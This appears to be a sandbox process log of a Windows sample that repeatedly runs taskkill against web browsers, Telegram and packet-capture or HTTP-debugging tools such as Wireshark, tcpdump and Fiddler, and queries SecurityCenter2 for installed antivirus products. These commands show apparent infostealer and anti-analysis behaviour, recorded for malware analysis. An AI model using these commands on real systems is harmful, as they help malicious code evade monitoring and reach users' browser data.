C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa7e72ab58,0x7ffa7e72ab68,0x7ffa7e72ab78

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1676 --field-trial-handle=1996,i,17111423156218170146,7743307030148549597,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1932 --field-trial-handle=1996,i,17111423156218170146,7743307030148549597,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2276 --field-trial-handle=1996,i,17111423156218170146,7743307030148549597,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1996,i,17111423156218170146,7743307030148549597,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3224 --field-trial-handle=1996,i,17111423156218170146,7743307030148549597,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3620 --field-trial-handle=1996,i,17111423156218170146,7743307030148549597,131072 /prefetch:1

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4020 --field-trial-handle=1996,i,17111423156218170146,7743307030148549597,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4692 --field-trial-handle=1996,i,17111423156218170146,7743307030148549597,131072 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM opera.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM brave.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM vivaldi.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Telegram.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM fiddler.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM httpdebuggerui.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM wireshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tshark.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM tcpdump.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM ettercap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM dumpcap.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM windump.exe

